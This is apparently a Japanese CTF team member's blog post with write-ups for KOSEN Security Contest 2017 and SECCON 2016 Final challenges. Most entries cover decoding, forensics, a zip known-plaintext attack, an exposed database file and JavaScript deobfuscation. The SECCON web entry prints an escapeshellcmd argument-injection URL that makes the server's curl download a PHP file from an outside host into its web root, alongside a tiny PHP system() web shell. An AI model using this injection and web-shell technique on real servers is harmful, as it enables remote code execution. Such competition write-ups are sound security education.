KOSENセキュリティコンテスト 2017 Write-Up
PwnPwnPain(元EagleJump(元Harekaze))でKOSENセキュリティコンテスト 2017に参加してきました。結果は4位で2800点でした。そのうち自分が関わった900点についてのWrite-Upです。
ボスを倒せ - Binary 200
[Description]
とあるゲームを見つけたのだが、ボスがあまりにも強すぎて一切倒せそうにない。
どうにか倒す方法はないだろうか?
[Netcat]
nc score.kosensc2017.tech 40048
ユーザー名を入力し、その後自動で戦闘が進むプログラムだった。
20文字入力したら自分のHPが変動したので、どれくらいでオーバーフローするんだろうと思って8文字くらい入力したらボスのHPが30くらいになって何故か勝てた。奇跡。
FLAG: SCKOSEN{buffer_over_flow!}
簡単な符号化2 - Crypto 100
[Description]
ファイルからフラグを探せ
[Problem File]
https://score.kosensc2017.tech/contents/problem/6/binary
Base64エンコードされたものが渡されるため、とりあえずデコードするとバイナリのような物が出てきた。
これをバイナリエディタに貼り付けてfileコマンドやbinwalkで調べてみたりするが何も引っかからず悲しかった。
現段階でのファイルのシグネチャを見るとKPだったので、KPってなんだよ~って思って調べていたが何も見つからず。
家にお持ち帰りして深夜4時にこれリトルエンディアンではとひらめきCyberChefで変換すればシグネチャがPKなおなじみのバイナリが出てきた。(KPの時点でリトルエンディアンに気づくべきだった。)
jaganikuman$ file export export: Zip archive data, at least v2.0 to extract
zipを解凍したら以下のようにwordなファイルが沢山出てきたため、拡張子をzipからdocxに変えてwordで開いてFLAG獲得。
jaganikuman$ unzip export Archive: export inflating: _rels/.rels inflating: word/document.xml inflating: word/styles.xml inflating: word/_rels/document.xml.rels inflating: word/settings.xml inflating: word/fontTable.xml inflating: docProps/app.xml inflating: docProps/core.xml inflating: [Content_Types].xml
FLAG: SCKOSEN{TEXT_BUT_NOT_PLAIN}
ファイル送信pcap - Network 200
[Description]
これはファイルを送受信しているpcapです
[Problem File]
https://score.kosensc2017.tech/contents/problem/19/file.pcap
Lenna.png
とlock.zip
をPOSTしているpcapが与えられた。
lock.zip
にはLenna.png
とflag.txt
が入っていた。
pcapからLenna.png
とlock.zip
を取り出すと、zipにはパスワードが掛かっていた。
自分はLenna.png
にSteganoとかでパスワードが埋まっているんだろうと思ってstegano-lsbなど色々試したが、無理だった。
そこで、zipの中に入ってるLenna.png
が与えられているため、この事に着目して考えたら以下の記事に出会い、選択平文攻撃で出来そうと分かった。
Blog: 年越しCTF x86-64.jp大会 2014 を開催しました – x86-64.jp - くりす研
あとはチームメイトの@ushikenに投げてFLAG獲得。
FLAG: SCKOSEN{k_p_t_a}
灯台下暗し - Web 100
[Description]
パスワードを奪取せよ。
[Web Server]
http://score.kosensc2017.tech:40052
ログインフォームがあるWebページを与えられるが、その下にHintとしてphpのソースが乗っていた。
$try = false; $login = false; if( isset($_POST[‘name’]) && isset($_POST[‘password’])){ $name = htmlspecialchars($_POST[‘name’], ENT_QUOTES); $password = htmlspecialchars($_POST[‘password’], ENT_QUOTES); $db = new SQLite3(‘data.db’); $stmt = $db->prepare(“SELECT name FROM users WHERE name = ? AND password = ?“); $stmt->bindValue(1, $name, SQLITE3_TEXT); $stmt->bindValue(2, $password, SQLITE3_TEXT); $rows = $stmt->execute(); $row = $rows->fetchArray(); $try = true; $login = $rows && $row[‘name’]; $db->close(); }
sqliteのDBファイルを読み込んでいるので、このファイルが公開ディレクトリに設置されてて落とせるのではと思ってhttp://score.kosensc2017.tech:40052/data.db
にアクセスしたところ、ダウンロード出来た。
hintで与えられたソースに$stmt = $db->prepare(“SELECT name FROM users WHERE name = ? AND password = ?“);
とあるので、sqlite3でselect * from users;
でFLAG獲得。
jaganikuman$ sqlite3 data.db SQLite version 3.13.0 2016-05-18 10:57:30 Enter ".help" for usage hints. sqlite> select * from users; admin|SCKOSEN{database_bukkonuki!}
FLAG: SCKOSEN{database_bukkonuki!}
Web1 - Web 200
[Description]
no description.
[Web Server]
http://score.kosensc2017.tech:40050
難読化されたJavaScriptが読み込まれたWebページが与えられる。つまり難読化を読み解いていけと言うことですね。
___ = window; __ = document; s = “shift”; m = [“addEventListener”, “DOMContentLoaded”, “createElement”, “div”, “textContent”, “deobfuscate js and find the key”, “body”, “appendChild”, “length”, “join”, “forEach”, “parseInt”, “toString”, “toUpperCase”]; __[m[s]()](m[s](), ()=>{ _ = __[m[s]()](m[s]()); _[m[s]()] = m[s](); __[m[s]()][m[s]()](_); (()=>{ __ = [18234125, 323835316891, 11523, 907531478812, 744387234, 44203240442235, 844002446169231, 4601, ]; ____ = { _: m[s](), ___: m[s]() }; ____.__ = `____`[[____._]]; __[m[s]()]((n,_)=>{ __[_] = `${___[m[s | s]](n, _ + 1)[m[s ^ s ^ 1]](0O22 << 1)[m[-~-~s]]()}{${n}}`; if (__[_][____[“_”]] > 4) __[_] = Array(__[_][____[“_”]])[____[“___“]](“_”); } ); } )(); } , false);
アンダースコアを文字に置き換えて多少読みやすくした。
c = window; b = document; s = “shift”; m = [“addEventListener”, “DOMContentLoaded”, “createElement”, “div”, “textContent”, “deobfuscate js and find the key”, “body”, “appendChild”, “length”, “join”, “forEach”, “parseInt”, “toString”, “toUpperCase”]; b[m[s]()](m[s](), ()=>{ a = b[m[s]()](m[s]()); a[m[s]()] = m[s](); b[m[s]()][m[s]()](a); (()=>{ b = [18234125, 323835316891, 11523, 907531478812, 744387234, 44203240442235, 844002446169231, 4601, ]; d = { a: m[s](), c: m[s]() }; d.b = `d`[[d.a]]; b[m[s]()]((n,a)=>{ b[a] = `${c[m[s | s]](n, a + 1)[m[s ^ s ^ 1]](0O22 << 1)[m[-~-~s]]()}{${n}}`; if (b[a][d[“a”]] > 4) b[a] = Array(b[a][d[“a”]])[d[“c”]](“a”); } ); } )(); } , false);
これを自分に読み解いていくのは無理だと思ったので、各計算後に変数の内容をデバッグしていった。そうしたらFLAGが出た。難読化厳しい。
b[a] = `${c[m[s | s]](n, a + 1)[m[s ^ s ^ 1]](0O22 << 1)[m[-~-~s]]()}{${n}}`; console.log(b[a]);
FLAG: SCKOSEN{44203240442235}
通信を解析しろ - KoH 30
[Description]
pcapファイルを解析して、隠されたサービスを発見しろ。
[Problem File]
https://score.kosensc2017.tech/contents/problem/12/hoge.pcap
[Server Address]
http://10.201.1.102
13万パケットある12.4MBのpcapが渡された。
まず、pcap内からボーナスFLAGをチームメンバーの@tamanekoが見つけてくれた。
FLAG: SCKOSEN{p0rtkn0cking}
portknockingという事だったので、明らかにポートノッキングしてそうな通信が合ったためそれを再現してknockして、sshにアクセスしたり8081にアクセスしたりしてみるも何も返答がなかった。
競技終了後の解説を聞くとノックするポートは2つだけだったり、ノック後にアクセスする場所は443だったり、色々見当違いで悲しかった。
感想
今の自分には難易度的にはちょうどよい大会だった。
ただ、1日目後半にファイルシステムの500点問題が追加され、独自ファイルシステムの解析が出来ず上位3チームと綺麗に500点分差が生まれてしまった。
今回の負けの原因は完全にこのファイルシステムの問題なので、早いうちに各プロのWrite-Upを参考にしながら解いて力にしていきたい。
SECCON2016 Final WriteUp
おなじみ(?)のほら貝で始まったSECCON2016 Finalですが、King of the Hillだったのにサーバ攻略に手を付けられずに一生Jeopardyしていたのでそのうちの関わった2問について書いていきます。(2問しか解けてない…)
また、今回はKOSENセキュリティコンテストから、Harekazeとして参加してきました。 SECCON2016 Online予選で30人規模で参加していたチームとは別のチームです。(名前かぶり)
Find the key - Forensic 100pt
Find the key.
配布ファイル: question.vhd
vhdファイルが渡されるので、そこからフラグを見つける問題でした。
まず、vhdファイルだったので、マウントしようとしてみるも何故か失敗。(改めてWindowsでマウントしたところ、普通に行けたので焦って何らかのミスをしていたと思われる…)
その後チームメイトがFTK Imagerで開いたところ、画像.png
が見つかり、ステガノを探したりbinwalkを走らせたりするも、特に見つからず再び思考タイムに入る。
更にその後、1, 2, 3と連番のファイルが見つかり、1のファイルをプレビュー見たところ、SECCON{}のフラグ形式が少し見えた。
[f:id:jagaNikuman:20170130232911p:plain:w300]
が、しかし欠けていてフラグは読み取れなかったので、これ1, 2, 3のファイルのバイナリを連結すれば行けるのでは、とチームメンバー(@the_ko_show)に投げられたのでBzで連結したところ、フラグの画像が出てきた。
[f:id:jagaNikuman:20170130233537p:plain:w300]
SECCON{kakusuno dame}
画像ファイルと特定する段階だが、開いて画像が見れたのはたまたまだし、思いっきり先頭にFF D8 FF EEと書かれていたのでしっかりマジックナンバーを見て判別していきたい…
2016-10033-ish - Web 100pt
http://10.100.6.2/FLAGhere/
とのこと。タイトルからも分かるように、CVE-2016-10033を使った問題でした。
CVE-2016-10033は、phpのescapeshellcmd
関数がシングルクォート、ダブルクォートそれぞれが連続している場合のみエスケープするという仕様から生まれたPHPMailerの脆弱性だそうです。
escapeshellcmdの仕様としては、以下のようになるらしいです。(間違っていたらすみません)
文字列 | エスケープされるか | 念のため |
---|---|---|
‘’ | ⭕される | シングル・シングル |
‘“ | ❌されない | シングル・ダブル |
“” | ⭕される | ダブル・ダブル |
“‘ | ❌されない | ダブル・シングル |
まず、 http://10.100.6.2/FLAGhere/にアクセスするも、ソースには何も記述されていませんでした。
そこで、 http://10.100.6.2/にアクセスすると、UNDER CONSTRUCTION...
とのこと。
とりあえずソースを見てみると、
<link href="http://10.100.6.2/css-selector.php?set=0" rel="stylesheet" type="text/css">
と書かれていたので、http://10.100.6.2/css-selector.php?set=0
にアクセスすると、cssが表示され、set=0
の引数を消してcss-selector.php
に直接アクセスすると、main.css
とmain-test.css
の二つのリンクが表示されていた。
リンク先はcss-selector.php/css=./main.css
、css-selector.php/css=./main-test.css
となっていたので、これらの挙動からcss=ファイル名
でcssファイルを指定し、set=0
で指定したcssを取得していることが推測できました。
とりあえずcss-selector.php
のソースを見たかったので、css=./css-selector.php
として、set=0
にアクセスしたら無事ソースが見れました。
if($_GET['set'] == '0') { header("Content-Type: text/css"); echo file_get_contents($_SESSION['css']); }
とのことだったので、file_get_contents
でcss取り込んでくれるなら、以下のようなls -al
を発行するphpを自分のPCに置いて、それを読ませれば任意コマンド発行出来るのでは、と思うもfile_get_contents
は実行せずにファイルを取得するだけの関数だったので未遂に終わった。
<?php system('ls -al'); ?>
次に試したことは、
elseif($_GET['tool'] == 'curl') { $cmd = "/usr/bin/curl \"http://".$_GET['host']."\""; $cmd = escapeshellcmd($cmd); echo "<plaintext>cd ./writabletmp/; pwd; $cmd\n"; system("cd ./writabletmp/; pwd; $cmd 2>&1"); }
より、CVE-2016-10033の通りにescapeshellcmd
の脆弱性を使ってOSコマンドインジェクションを試してみた。が、最後のダブルクォーテーションをうまく消せずに断念。
ここで、自分は万策尽きてしまったのでチームメイトに投げたところ、オプションならインジェクション出来そうだから、-o
を付けてサーバにphp仕込めそう、とのことだったがPermission Deniedになる。
と言われたのでソースをもう一度よく見るとwritabletmp
というあからさまなディレクトリに移動してからcurlを発行していたので、writabletmp
以下に書き込むように修正を加えた。
http://10.100.6.2/css-selector.php?&tool=curl&host=192.168.23.3/seccon/ls.php" -o /var/www/html/writabletmp/ls.php"
これを発行したところ、
cd ./writabletmp/; pwd; /usr/bin/curl "http://192.168.23.3/seccon/ls.php" -o /var/www/html/writabletmp/ls.php"" /var/www/html/writabletmp % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 105 317 105 317 0 0 114k 0 --:--:-- --:--:-- --:--:-- 309k
とのことで、Permission Deniedされなかったのでhttp://http://10.100.6.2/writabletmp/ls.php/
にアクセスしてフラグ獲得。
SECCON{escapeshellcmd_CVE-2016-10033}
OSコマンドインジェクションだと思ったり、phpのバージョンが5.3.3だったことからヌルバイト攻撃か…?とも思ったりしたけど全くの見当違いで1日潰したの辛かった…
感想
今回始めてSECCON参加して分かった事が、pwn出来ないとまともに点が取れなかったということでした。とりあえずハリネズミから始めていきたいと思います。
pwnつらい…